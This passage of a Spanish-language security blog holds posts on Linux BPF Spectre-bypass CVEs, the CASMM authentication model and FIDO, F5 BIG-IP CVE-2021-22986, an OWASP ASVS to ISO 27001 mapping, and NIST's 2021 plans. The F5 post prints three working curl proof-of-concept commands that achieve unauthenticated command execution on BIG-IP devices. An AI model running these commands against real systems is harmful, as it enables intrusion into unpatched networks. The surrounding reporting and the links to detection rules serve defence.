<a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/spectre-bypass-linux-vulnerabilities" rel="nofollow" target="_blank">descritas por Symantec</a>.
</p>
<h3 style="text-align: left;">
¿Cómo funcionan estas nuevas vulnerabilidades?
</h3>
<p>
Ambas vulnerabilidades están relacionadas con el soporte del kernel de Linux
para los <i>"filtros de paquetes de Berkeley extendidos"</i> (BPF). BPF
permite a los usuarios ejecutar programas proporcionados por el usuario
directamente en el kernel de Linux. Al cargar estos programas, el kernel de
Linux analiza el código del programa para asegurarse de que sean seguros. Sin
embargo, parte de este análisis, destinado a mitigar Spectre, no fue
suficiente para proteger contra algunas técnicas de explotación.
</p>
<p>
Piotr pudo demostrar dos métodos diferentes para evitar esta protección. Estos
métodos son independientes ya que abusan de diferentes problemas, y cada uno
permite a los usuarios locales sin privilegios extraer el contenido de la
memoria del kernel. Esto puede incluir secretos (contraseñas, contenido del
portapapeles, etc.) de otros usuarios en un sistema afectado.
</p>
<p>
El problema más grave es CVE-2020-27170, del que se puede abusar para revelar
contenido desde cualquier ubicación dentro de la memoria del kernel, en otras
palabras, toda la RAM de la máquina. Los programas BPF sin privilegios que se
ejecutan en los sistemas afectados podrían evitar las mitigaciones de Spectre
y ejecutar cargas especulativas fuera de los límites sin restricciones. Esto
luego podría abusarse para revelar el contenido de la memoria a través de
canales laterales. </p>
<p>
El segundo problema informado, CVE-2020-27171, puede revelar contenido de un
rango de memoria del kernel de 4 GB alrededor de algunas de las estructuras
que están protegidas. Este problema se debe a un error numérico en las
mitigaciones de Spectre al proteger la aritmética de punteros contra
especulaciones fuera de límites. </p>
<h3 style="text-align: left;">
¿Cómo se podrían aprovechar estas vulnerabilidades?
</h3>
<p>
El escenario más probable en el que estas vulnerabilidades podrían explotarse
es en una situación en la que varios usuarios tienen acceso a una sola
computadora afectada, como podría ser el caso en situaciones laborales, etc.
En este escenario, cualquiera de los usuarios sin privilegios podría abusar de
uno de los vulnerabilidades para extraer contenido de la memoria del kernel
para localizar secretos de otros usuarios.
</p>
<p>
Los errores también podrían potencialmente ser explotados si un actor
malintencionado pudiera obtener acceso a una máquina explotable a través de un
paso previo, como descargar malware en la máquina para lograr el acceso
remoto, esto podría permitirles explotar estas vulnerabilidades para obtener
acceso a todos los perfiles de usuario de la máquina.
</p>
<h3 style="text-align: left;">Mitigación</h3>
<p>
</p><h4>Debian</h4>
<p></p>
<ul>
<li>
<a href="https://salsa.debian.org/kernel-team/linux/-/commit/6f9d6c3b36aa0eaebcc6a4d9867002fbe7f3385f">https://salsa.debian.org/kernel-team/linux/-/commit/6f9d6c3b36aa0eaebcc6a4d9867002fbe7f3385f</a>
</li>
<li>
<a href="https://salsa.debian.org/kernel-team/linux/-/commit/32ecff90fdb4be6326facc957e15ab7a6b673642">https://salsa.debian.org/kernel-team/linux/-/commit/32ecff90fdb4be6326facc957e15ab7a6b673642</a>
</li>
</ul>
<p>
Version 10.9 (released on March 27, 2021)
</p>
<ul>
<li>
<a href="https://salsa.debian.org/kernel-team/linux/-/commit/86d793b5ca9d2a7cf0da165c3ce84d26ea9d383d">https://salsa.debian.org/kernel-team/linux/-/commit/86d793b5ca9d2a7cf0da165c3ce84d26ea9d383d</a>
</li>
<li>
<a href="https://salsa.debian.org/kernel-team/linux/-/commit/1cb70f1dd40da6c3280b64c27804a065b39150f2">https://salsa.debian.org/kernel-team/linux/-/commit/1cb70f1dd40da6c3280b64c27804a065b39150f2</a>
</li>
</ul>
<p>
</p><h4>Ubuntu</h4>
<p></p>
<ul>
<li>
<a href="https://ubuntu.com/security/notices/USN-4887-1">https://ubuntu.com/security/notices/USN-4887-1</a>
</li>
</ul>
<p>
</p><h4>Red Hat</h4>
<p></p>
<ul>
<li>
<a href="https://access.redhat.com/security/cve/cve-2020-27170">https://access.redhat.com/security/cve/cve-2020-27170</a>
</li>
<li>
<a href="https://access.redhat.com/security/cve/cve-2020-27171">https://access.redhat.com/security/cve/cve-2020-27171</a>
</li>
</ul>
<p>
</p><h4>Bugzilla</h4>
<p></p>
<ul>
<li>
<a href="http://bugzilla.redhat.com/CVE-2020-27170">bugzilla.redhat.com/CVE-2020-27170</a>
</li>
<li>
<a href="http://bugzilla.redhat.com/CVE-2020-27171">bugzilla.redhat.com/CVE-2020-27171</a>
</li>
</ul>
<p>
Todos los usuarios de distribuciones de Linux deben consultar con su
proveedor para asegurarse de que se hayan aplicado parches para estas
vulnerabilidades.
</p><p>Fuente: <a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/spectre-bypass-linux-vulnerabilities" rel="nofollow" target="_blank">Symantec</a></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-2023186704032256882021-03-26T10:39:00.012-03:002024-02-14T15:56:00.288-03:00Modelo de Madurez sobre la Fortaleza de la Autenticación (CASMM)<p>
El
<a href="https://danielmiessler.com/p/casmm-consumer-authentication-security-maturity-model/" rel="nofollow" target="_blank">Consumer Authentication Strength Maturity Model (CASMM)</a>
de
<a href="https://danielmiessler.com/" rel="nofollow" target="_blank">Danniel Miessler</a>
(aka
<a href="https://twitter.com/danielmiessler" rel="nofollow" target="_blank">@DanielMiessler</a>) es un intento de crear un modelo de seguridad fácil de usar por el usuario
promedio. Básicamente,
<b>¿qué tan seguro es el comportamiento actual de alguien con respecto a sus
contraseñas y el proceso de autenticación, y cómo puede mejorarlo?
</b>
</p>
<p>
<b>CASMM</b>: este acrónimo se puede pronunciar como <i>"CHASM"</i>, del
inglés "Abismo"; es decir "¿qué tan profundo estás en el abismo?" 🙂 A la
gente le gusta subir de rango, ¡así que usemos eso!
</p>
<div style="text-align: center;">
<img height="600" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/32190fe5-e942-44ec-9e97-ee9fafb47e87/casmm-miessler-v6-1.png" width="640" />
</div>
<p>
<b>Nota:</b> existen rangos más altos de autenticación, pero este modelo es
específicamente para usuarios normales.
</p>
<h3 style="text-align: left;">Cómo usar este modelo</h3>
<p>
La idea aquí es que alguien de la comunidad de seguridad, o realmente
cualquier usuario experto en seguridad, use este elemento visual para ayudar a
alguien con una "mala higiene" de contraseñas a subir algunos peldaños.
Cualquier mejora que el usuario haga en el uso de sus contraseñas es buena.
Incluso un paso importa.
</p>
<ol style="text-align: left;">
<li>
<b> Dónde está el usuario:</b> la primera forma de usar este modelo es
simplemente preguntar al usuario sobre su comportamiento actual y mostrarles
dónde se ubica dentro de los siete peldaños. Si el usuario está en el
peldaño 6 o 7, la combinación de ver qué tan bajo está y el color, puede
transmitirle cierta preocupación.
</li>
<li>
<b>Cómo subir:</b> a continuación, se le puede mostrar cómo puede mejorar y
subir algunos peldaños. Como se discute en
<a href="https://twitter.com/DanielMiessler/status/1374853281600532483" rel="nofollow" target="_blank">este hilo de Twitter</a>, el mayor beneficio se obtiene al pasar del peldaño 4 al 3. El siguiente
gran salto se produce al pasar del 2 (o inferior) al 1.
</li>
</ol>
<h3 style="text-align: left;">Resumen</h3>
<ul style="text-align: left;">
<li>
Los modelos de madurez visual a veces pueden ayudar a las personas con su
deseo de mejorar.
</li>
<li>
La mayor mejora de seguridad que se puede obtener es pasar de cualquier
peldaño inferior al 4 al 3 (usar 2FA).
</li>
<li>
La segunda mejora de seguridad es pasar del peldaño 2 o 3 al peldaño 1 (2FA
basado en token).
</li>
<li>
Tratar de no omitir pasos, es decir, es mejor pasar a contraseñas únicas y
de calidad almacenadas en un administrador antes de agregar un 2FA.
</li>
</ul>
<h3 style="text-align: left;">Uso de FIDO para evitar el #phishing</h3>
<p>
<b>
Los modelos de autenticación actual plantean la pregunta: ¿existe algún tipo
o modelo que proteja contra el phishing? La respuesta es sí.
</b>
</p>
<p></p>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://fidoalliance.org/what-is-fido/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="162" data-original-width="200" height="162" src="https://www.onespan.com/sites/default/files/styles/max_325x325/public/2019-03/fido-alliance.png?itok=a8LFHaW4" width="200" /></a>
</div>
<p></p>
<p>
<a href="https://fidoalliance.org/what-is-fido/" rel="nofollow" target="_blank">FIDO significa Fast Identity Online</a>, y utiliza los protocolos Universal Authentication Framework (UAF) y
Universal Second Factor (U2F). Los sistemas utilizan criptografía de clave
pública y un token de acceso físico. La clave privada se almacena en el token
y se mantiene con usted, y la clave pública se almacena con los servicios en
los que desea autenticarse.
</p>
<p>
No se puede suplantar un código MFA que no existe. Cuando te autenticas, le
demuestras al cliente/token que eres tú (huella digital, PIN, voz, etc.), y el
cliente crea una solicitud firmada que se envía al servicio. Esa solicitud se
descifra y se autentica con la clave pública, lo que prueba que la solicitud
se realizó con la clave privada, y luego se le autentica.
</p><h3 style="text-align: left;">FIDO2 + WebAuthn </h3>
<p><b>
FIDO2 / <a href="https://webauthn.io/" rel="nofollow" target="_blank">WebAuthn</a> es la versión sin contraseña de FIDO (<i>passwordless</i>), y
<u>la parte sin contraseña es fundamental</u>.</b> Aquí cambia completamente la
forma en que se realiza la autenticación: en lugar de presentarse en un sitio
web, que podría ser malicioso, el usuario se autentica utilizando su token
físico, por ejemplo ingresando la huella digital o la cara o lo que sea. Y
cuando eso sucede (esta es la parte brillante), el token local crea una
solicitud y la firma con la clave privada del token… ¡Y luego lo envía
específicamente a la URL exacta y legítima asociada con el token!
</p>
<p>
<b>Esa es la magia. Cuando se registra el token con, por ejemplo, Gmail, el
token recopila la URL oficial de Gmail, por lo que solo puede enviar
solicitudes de autenticación a esa URL.</b>
</p>
<div>
La mejor parte de todo este flujo es que no hay nada que escribir. Todo lo que
se hace es tocar algo o mirar un dispositivo. Todo lo demás sucede en el
<i>backend</i> automáticamente.
</div>
<p>
Fuente: <a href="https://danielmiessler.com/blog/casmm-consumer-authentication-security-maturity-model-2/" rel="nofollow" target="_blank">CASSM by Danniel Miessler</a>
| <a href="https://danielmiessler.com/p/casmm-consumer-authentication-security-maturity-model/" rel="nofollow" target="_blank">II</a> |
<a href="https://danielmiessler.com/blog/not-all-mfa-is-equal-and-the-differences-matter-a-lot/" rel="nofollow" target="_blank">III</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-10067833774402602422021-03-22T07:37:00.015-03:002021-03-23T12:20:27.197-03:00Exploits para la vulnerabilidad crítica de F5 BIG-IP y BIG-IQ (CVE-2021-22986)<p>
Casi 10 días después de que la empresa
<a href="https://blog.segu-info.com.ar/2021/03/actualizaciones-criticas-de-microsoft-y.html" rel="nofollow" target="_blank">F5 Networks lanzara parches para vulnerabilidades críticas</a>
en sus productos BIG-IP y BIG-IQ, los adversarios comenzaron a
<a href="https://twitter.com/bad_packets/status/1372650076024107009" rel="nofollow" target="_blank">escanear en de forma masiva</a>, apuntando a este tipo de dispositivos de red expuestos y sin parches para
ingresar a las redes empresariales.
</p>
<p>
La noticia de la
<a href="https://twitter.com/1ZRR4H/status/1373206181955653632" rel="nofollow" target="_blank">explotación In-the-Wild</a>
llega inmediatamente después de la aparición de
<a href="https://twitter.com/wugeej/status/1372392693989445635" rel="nofollow" target="_blank">varias</a>
<a href="https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986" rel="nofollow" target="_blank">PoC</a> y
<a href="https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP" rel="nofollow" target="_blank">códigos publicados</a>. La explotación se habría logrado a principios de semanas y mediante la
ingeniería inversa del parche de software Java en BIG-IP.
</p>
<h3 style="text-align: left;">PoC #1</h3>
<pre><code>curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'</code>
</pre>
<h3>PoC #2</h3>
<pre><code>curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'</code></pre>
<h3>PoC #3</h3>
<pre><code>curl -ksu admin:[pass] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'</code>
</pre>
<p>
Las fallas afectan las versiones 11.6 o 12.xy más recientes de BIG-IP, con una
ejecución de código remoto crítico (CVE-2021-22986) que también afecta las
versiones 6.xy 7.x de BIG-IQ.
</p>
<p>
<a href="https://support.f5.com/csp/article/K03009991" rel="nofollow" target="_blank">CVE-2021-22986</a>
(puntuación CVSS: 9,8) destaca por el hecho de que se trata de una
vulnerabilidad de ejecución remota de comandos no autenticada (RCE completo)
que afecta a la interfaz REST de iControl, lo que permite a un atacante
ejecutar comandos arbitrarios del sistema, crear o eliminar archivos y
deshabilitar servicios sin el necesidad de cualquier autenticación.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="298" data-original-width="728" height="273" src="https://pbs.twimg.com/media/Ew6acTLXIAUFeCg?format=jpg&name=large" width="640" />
</div>
<p>
La explotación exitosa de estas vulnerabilidades podría conducir a un
compromiso total de los sistemas susceptibles, incluida la posibilidad de
ejecución remota de código, así como desencadenar un desbordamiento del búfer,
lo que provocaría un ataque de denegación de servicio (DoS).
</p>
<p>
Si bien F5 dijo que no estaba al tanto de ninguna explotación pública de estos
problemas el 10 de marzo,
<a href="https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/" rel="nofollow" target="_blank">los investigadores del Grupo NCC dijeron</a>
que ahora han encontrado evidencia de
<i>"explotación de cadena completa de las vulnerabilidades de F5 BIG-IP /
BIG-IQ iControl REST API CVE-2021 -22986, a raíz de múltiples intentos de
explotación contra su infraestructura honeypot"</i>.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img height="287" src="https://i2.wp.com/research.nccgroup.com/wp-content/uploads/2021/03/MicrosoftTeams-image-133.png?ssl=1" width="640" />
</div>
<p>
Además, el equipo de inteligencia de amenazas de la
<a href="https://twitter.com/Unit42_Intel/status/1373017186818781190" rel="nofollow" target="_blank">Unidad 42 de Palo Alto Networks dijo</a>
que encontró intentos de explotar CVE-2021-22986 para
<a href="https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/" rel="nofollow" target="_blank">instalar una variante de la botnet Mirai</a>. Pero no está claro si esos ataques tuvieron éxito.
</p>
<p>
Dada la popularidad de BIG-IP / BIG-IQ en las redes corporativas y
gubernamentales, no debería sorprender que esta sea la segunda vez en un año
que los dispositivos F5 se han convertido en un objetivo lucrativo para la
explotación.
</p>
<p>
En julio pasado, la compañía abordó una falla crítica similar (<a href="https://thehackernews.com/2020/07/f5-big-ip-application-security.html" rel="nofollow" target="_blank">CVE-2020-5902</a>), luego de la cual fue abusada por
<a href="https://geekprank.com/hacker/" rel="nofollow" target="_blank">grupos de atacantes informáticos patrocinados por el estado iraní y
chino</a>, lo que llevó a la Agencia de Seguridad de Infraestructura y Ciberseguridad
de los EE.UU. (CISA) a emitir una alerta advirtiendo sobre una
<i>"amplia actividad de escaneo para la presencia de esta vulnerabilidad en
todos los departamentos y agencias federales"</i>.
</p>
<p>
<i>
"La conclusión es que [las fallas] afectan a todos los clientes e instancias
de BIG-IP y BIG-IQ; instamos a todos los clientes a actualizar sus
implementaciones de BIG-IP y BIG-IQ a las versiones fijas lo antes
posible"</i>,
<a href="https://www.f5.com/company/blog/big-ip-and-big-iq-vulnerabilities-protecting-your-organization" rel="nofollow" target="_blank">dijo</a>
el Kara Sprague de F5 la semana pasada.
</p>
<p>
Ya se pueden descargar los <a href="https://github.com/pan-unit42/tweets/commit/5ac81424494a25b7a3a83fb86e91d05717544f9b" rel="nofollow" target="_blank">IOCs</a>, <a href="https://github.com/Neo23x0/signature-base/commit/e43efd446c30c8d2f5742f3fd5f5d66514114dff" rel="nofollow" target="_blank">reglas de Yara</a> y <a href="https://github.com/nccgroup/Cyber-Defence/blob/master/Signatures/suricata/2021_03_cve_2021_22986.txt" rel="nofollow" target="_blank">reglas de Suricata</a>
para la detección de CVE-2021-22986.</p>
<p>
Fuente:
<a href="https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html" rel="nofollow" target="_blank">THN</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-3182363575026293702021-03-09T10:06:00.000-03:002021-03-09T10:06:27.218-03:00Cómo OWASP ASVS puede ayudar a alinearse con ISO 27001 (y viceversa)<p style="text-align: right;">
<i>
Por de
<a href="https://www.pivotpointsecurity.com/blog/author/bhaumikshah/" rel="nofollow" target="_blank">Bhaumik Shah</a>
de
<a href="https://www.pivotpointsecurity.com/blog/owasp-asvs-vs-iso-27001-alignment/" rel="nofollow" target="_blank">Pivot Security</a>
- Traducido por
<a href="https://www.segu-info.com.ar/" rel="nofollow" target="_blank">Segu-Info</a>
</i>
</p>
<p>
El
<a href="https://owasp.org/www-project-application-security-verification-standard/" rel="nofollow" target="_blank">Estándar de Verificación de Seguridad de Aplicaciones de OWASP ASVS</a> es una lista de requisitos o pruebas de seguridad de aplicaciones que los
arquitectos, desarrolladores, evaluadores, profesionales de la seguridad e
incluso los consumidores pueden utilizar para definir qué constituye una
aplicación segura.
</p>
<p>
OWASP ASVS ofrece una lista completa de requisitos, controles y pruebas de
seguridad de aplicaciones web que puede utilizar para determinar el alcance,
crear y verificar aplicaciones web y móviles seguras. Permite a las
organizaciones desarrollar y mantener aplicaciones más seguras; y también
brinda a los proveedores de servicios de seguridad y proveedores un conjunto
de controles bien documentado con el que pueden alinear sus requisitos y
ofertas. La última versión,
<a href="https://github.com/OWASP/ASVS/tree/v4.0.2#latest-stable-version---402" rel="nofollow" target="_blank">OWASP ASVS v4.0.2</a>, se lanzó en octubre de 2020.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="265" data-original-width="800" height="212" src="https://www.pivotpointsecurity.com/wp-content/uploads/2019/09/capture_ASVS_controls.png" width="640" />
</div>
<p>
A continuación explico cómo los requisitos de seguridad y las pruebas de ASVS
se corresponden con ISO 27001; o más específicamente cómo se asignan a ISO
27002, la cual proporciona detalles y orientación prescriptiva sobre cómo
implementar los controles enumerados en el Anexo A de ISO 27001.
</p>
<h3 style="text-align: left;">V1: Arquitectura, diseño y modelado de amenazas</h3>
<p>
La sección de
arquitectura, diseño y modelado de amenazas del ASVS
cubre cómo verificar la arquitectura de una aplicación y también su modelado
de amenazas ante todos los riesgos aplicables.
</p>
<p>
Esto es paralelo a la sección A.8 de ISO 27001, que cubre la gestión de
activos (por ejemplo, inventario de activos, clasificación, etc.). Esto se
debe a que, para verificar la arquitectura de la aplicación y el modelo de
amenazas, es necesario hacer un inventario de todos los activos de información
asociados con la aplicación.
</p>
<h3 style="text-align: left;">V2: Autenticación</h3>
<p>
La sección de requisitos de verificación de autenticación de ASVS explica cómo
verificar la identidad digital del remitente de una comunicación a la
aplicación, cómo garantizar que solo las entidades autorizadas puedan
autenticarse y las credenciales se transporten de forma segura.
</p>
<p>
Esto se corresponde con los controles de la sección A.9 de la norma ISO 27001,
que trata de los requisitos de control de acceso. Cualquier aplicación que
cumpla con los estrictos y detallados requisitos de ASVS en torno a la
autenticación seguramente cumplirá con la norma ISO 27001 a este respecto.
Además, la guía de ASVS sobre el registro de decisiones de control de acceso
(si las solicitudes de acceso tuvieron éxito o no) cubre la sección A.12.4 de
ISO 27001.
</p>
<h3 style="text-align: left;">V7: Criptografía en reposo</h3>
<p>
La sección V7 de ASVS cubre el cifrado. Esto coincide con la sección A.10 de
ISO 27001, que cubre los controles criptográficos, incluida la gestión de
claves.
</p>
<p>
Si una aplicación pasa todas las pruebas en ASVS V7, esto ayudará
significativamente a cumplir con la sección A.18 de ISO 27001. Por ejemplo,
ASVS Nivel 2 y 3 exige el cifrado en reposo de todos los datos confidenciales,
que aborda directamente el requisito de cumplimiento en el control A.18 de ISO
27001.
</p>
<h3 style="text-align: left;">V8: Manejo y registro de errores</h3>
<p>
Los requisitos de verificación de registro y manejo de errores de ASVS son una
combinación perfecta para los controles en A.12.4 en ISO 27001, que cubre el
registro y monitoreo.
</p>
<p>
El ASVS especifica que los eventos deben registrarse y estar disponibles para
su investigación en el futuro, y también el registro debe protegerse del
acceso no autorizado. Los registros también deben almacenarse en una partición
diferente a la de la aplicación en ejecución. ASVS establece además que las
aplicaciones no deben registrar datos confidenciales según lo definido por las
regulaciones de privacidad aplicables (y/o la evaluación de riesgos ISO
27001).
</p>
<p>
Estos y otros requisitos en el ASVS se corresponden muy de cerca con A.12.4.
Por lo tanto, si una aplicación cumple con ASVS en este sentido, también debe
cumplir con los requisitos para la certificación ISO 27001.
</p>
<h3 style="text-align: left;">V9: Protección de datos</h3>
<p>
El ASVS V9 cubre los requisitos de protección de datos y hace referencia a
<i>"tres elementos clave para una protección de datos sólida:
confidencialidad, integridad y disponibilidad (CIA)"</i>. La coincidencia más cercana a estos requisitos en ISO 27001 es A.18.1.3,
que se refiere a la protección de registros confidenciales contra el acceso no
autorizado, la modificación, etc.
</p>
<h3 style="text-align: left;">V10: Seguridad de las comunicaciones</h3>
<p>
Los requisitos especificados en ASVS V10 para verificar la seguridad de las
comunicaciones se relacionan con el cumplimiento de la sección A.14.1 de ISO
27001. Esta sección trata sobre la seguridad de las comunicaciones a través de
redes públicas; p. ej., ¿una aplicación cifra las transacciones o garantiza de
alguna otra forma que estén seguras y protegidas?
</p>
<h3 style="text-align: left;">Otros paralelos ASVS e ISO</h3>
<p>
Además de lo anterior, existen varios paralelismos entre los principios de
ingeniería segura en ISO 27001 A.14.2 y A.14.3 y los requisitos de ASVS para
la configuración de seguridad HTTP, verificación de controles maliciosos,
lógica de negocios, verificación de archivos y recursos, pruebas de
aplicaciones móviles, verificación de servicios web, requisitos de
configuración y más.
</p>
<p>
OWASP ASVS es un gran marco para que lo adopte cualquier organización de
desarrollo, con el fin de garantizar que las aplicaciones y sus arquitecturas
sean seguras. Como ventaja adicional, verificar que una aplicación cumpla con
las pautas de ASVS puede ayudar a acercarse al cumplimiento de ISO 27001,
siempre que la aplicación esté dentro del alcance de su esfuerzo de
cumplimiento de ISO.
</p>
<p>
De hecho, es sorprendente que haya tantas correspondencias entre los dos
marcos, dado que ISO 27001 aborda la seguridad de la información de manera
integral, mientras que ASVS se centra estrictamente en la seguridad de las
aplicaciones.
</p>
<p>
Fuente: <a href="https://www.pivotpointsecurity.com/blog/author/bhaumikshah/" rel="nofollow" style="text-align: right;" target="_blank">Bhaumik Shah</a><span style="text-align: right;"> </span><span style="text-align: right;">de</span><span style="text-align: right;"> </span><a href="https://www.pivotpointsecurity.com/blog/owasp-asvs-vs-iso-27001-alignment/" rel="nofollow" style="text-align: right;" target="_blank">Pivot Security</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-49771299298041235252021-03-05T12:06:00.002-03:002021-03-05T12:10:20.058-03:00Nuevos estándares y guías de Seguridad y Privacidad de NIST 2021<div class="separator"><center style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img src="https://www.nist.gov/sites/default/files/styles/220_x_220_limit/public/images/2019/10/18/framework_functions_wheel.png" />
<img src="https://www.nist.gov/sites/default/files/styles/220_x_220_limit/public/images/2019/10/18/wheel_pie.png" /></center></div><p>
En 2020, el NIST dio prioridad a ayudar a las personas y a las organizaciones
para moverse a un entorno más en línea y más seguro. A medida que el NIST mira
hacia la "nueva normalidad", planea aprovechar las lecciones aprendidas
durante la pandemia y ser aún más estratégicos para anticipar y abordar los
muchos desafíos que tenemos por delante. Por eso
<a href="https://www.nist.gov/blogs/cybersecurity-insights/2021-whats-ahead-nist-cybersecurity-and-privacy" rel="nofollow" target="_blank">NIST propone</a>:
</p>
<ul style="text-align: left;">
<li>
Aumentar la atención en la gestión de los riesgos de ciberseguridad como
parte integral del riesgo empresarial
</li>
<li>
Prestar más atención a la intersección entre la ciberseguridad y la
privacidad
</li>
<li>
Hacer hincapié en la ciberseguridad de los sistemas frente a los componentes
y trabajar en estándares transversales.</li>
</ul>
<p>
Para garantizar el cumplimiento de tales objetivos, presenta y pone a
evaluación global las siguientes herramientas de gestión publicadas o a
publicar durante 2021:
</p>
<ul>
<li>
Buscan comentarios públicos sobre el
<a href="https://www.nist.gov/cyberframework" rel="nofollow" target="_blank">Cybersecurity Framework (CSF)</a>: cómo se está utilizando y cómo podría mejorarse. Ya no se verá el CSF de
forma aislada. NIST querrá saber cómo podemos combinar mejor el CSF con el
<a href="https://www.nist.gov/privacy-framework" rel="nofollow" target="_blank">Privacy Framework (PF)</a>, el
<a href="https://www.nist.gov/cyberframework/risk-management-framework" rel="nofollow" target="_blank">Risk Management Framework (RMF)</a> y los enfoques de gestión de riesgos de la cadena de suministro, así
como con la gestión de riesgos empresariales (ERM).
</li>
<li>
También emitirán marcos de trabajo para los servicios de posicionamiento,
navegación y cronometraje, sistemas electorales y el sector marítimo
(borrador). Pronto propondremos una revisión de las
<i><a href="https://csrc.nist.gov/publications/detail/sp/800-161/final">Supply Chain Risk Management Practices for Federal Information Systems
and Organizations</a></i> (SP 800-161). Ese es un documento clave de gestión de riesgos de la
cadena de suministro (C-SCRM) en el que se confía en gran medida en los
sectores público y privado.
</li>
<li>
También trabajan en requisitos
<a href="https://www.nist.gov/news-events/news/2021/02/nist-offers-tools-help-defend-against-state-sponsored-hackers"><i>Enhanced Security Requirements for Protecting Controlled Unclassified
Information</i></a> un suplemento de
<a href="https://csrc.nist.gov/publications/detail/sp/800-171/rev-2/final" rel="nofollow" target="_blank">NIST SP 800-171</a>
y una nueva revisión de la
<a href="https://csrc.nist.gov/publications/detail/sp/800-53a/rev-4/final" rel="nofollow" target="_blank">NIST SP 800-53A</a>, que proporciona procedimientos para evaluar la seguridad y controles de
privacidad.
</li>
<li>
También se actualizará la guía
<a href="https://csrc.nist.gov/publications/detail/sp/800-47/final"><i>Security Guide for Interconnecting information Technology Systems</i></a>
(SP 800-47), que agrega un énfasis muy necesario en la protección de la
información intercambiada entre organizaciones y la base de riesgo para las
decisiones de intercambio de información.
</li>
<li>
Ya han publicado una guía de inicio rápido para el cada vez más popular
<a href="https://www.nist.gov/privacy-framework" rel="nofollow" target="_blank">Marco de privacidad del NIST</a>. Nominalmente para pequeñas y medianas empresas, esta guía puede ayudar a
cualquier organización con recursos limitados a poner en marcha un programa
de privacidad basado en riesgos o mejorar uno existente.
</li>
<li>
También han lanzado un
<a href="https://www.nist.gov/privacy-framework/ccpa-crosswalk-bakerhostetler" rel="nofollow" target="_blank">paso a paso</a>
muy necesario, aportado por las partes interesadas, entre la Ley de
Privacidad del Consumidor de California (CCPA) y el Marco de Privacidad.
</li>
<li>
El fortalecimiento de los estándares criptográficos y la validación ha sido
durante mucho tiempo un pilar de los esfuerzos de seguridad del NIST, y 2021
no será diferente. Al examinar nuevos enfoques de cifrado y protección de
datos que protegerán del ataque de una computadora cuántica, la
<a href="https://www.nist.gov/news-events/news/2020/07/nists-post-quantum-cryptography-program-enters-selection-round" rel="nofollow" target="_blank">"ronda de selección" de la competencia del NIST</a>
ayudará a la agencia a decidir sobre el pequeño subconjunto de algoritmos
presentados que formarán el núcleo del primer estándar de criptografía
post-cuántica. El NIST se acercará más a lanzar el estándar inicial para la
criptografía resistente a ataques cuánticos, que se dará a conocer en 2022.
Antes de eso, muy probablemente este año, el NIST seleccionará a los
ganadores en una competencia para solicitar, evaluar y estandarizar
algoritmos criptográficos ligeros adecuados para su uso en entornos
restringidos donde el rendimiento de los estándares criptográficos NIST
actuales no es aceptable.
</li>
<li>
La concientización, capacitación, la educación en ciberseguridad y el
desarrollo de la fuerza laboral son más críticos que nunca. La Iniciativa
Nacional para la Educación en Ciberseguridad (<a href="https://www.nist.gov/itl/applied-cybersecurity/nice" rel="nofollow" target="_blank">NICE</a>) liderada por el NIST este año enfatiza la importancia de las
"competencias" como una forma de describir las habilidades de ciberseguridad
y para comunicarse entre empleadores y estudiantes.
</li>
<li>
A lo largo del año, se esperan más detalles sobre el programa sobre métricas
y medidas de ciberseguridad. El objetivo es apoyar el desarrollo de medidas
técnicas para determinar el efecto de los riesgos y las respuestas de
seguridad en los objetivos de una organización. Entre otras cosas, NIST
publicará una versión actualizada de la
<a href="https://csrc.nist.gov/publications/detail/sp/800-55/rev-2/draft">Performance Measurement Guide for Information Security (SP 800-55
Revision 1)</a>
y continuará aumentando la identificación y asignación de métricas en la
base de datos nacional de vulnerabilidades (NVD).
</li>
<li>
La gestión de identidades y accesos subyace en gran parte de lo que está
sucediendo en ciberseguridad en este momento. Se está trabajando sobre
<a href="https://en.wikipedia.org/wiki/FIPS_201" rel="nofollow" target="_blank">FIPS 201</a>
(el estándar detrás de la tarjeta PIV y las credenciales PIV derivadas) y
esperan producir una revisión final este año. Esa "Revisión 3" ampliará el
conjunto de credenciales PIV y permitirá la verificación de identidad
supervisada remotamente y señalará a la federación como el medio para la
interoperabilidad entre organizaciones.
</li>
<li>
Existe una necesidad urgente de demostrar la viabilidad comercial y práctica
de IPv6. El NIST trabaja en proporcionar un enfoque, herramientas y métodos
para implementar IPv6, comenzando desde un IPv6 en modo de doble-pila y
terminando con un IPv6 sólo-red.
</li>
<li>
También se redoblan los esfuerzos de ciberseguridad 5G y
<a href="https://www.nccoe.nist.gov/projects/building-blocks/zero-trust-architecture" rel="nofollow" target="_blank">Zero Trust de NCCoE</a>. Se buscar trabajar en código abierto que aproveche los estándares de
ciberseguridad y las prácticas recomendadas para mostrar las sólidas
funciones de seguridad de 5G en una infraestructura de nube confiable. En el
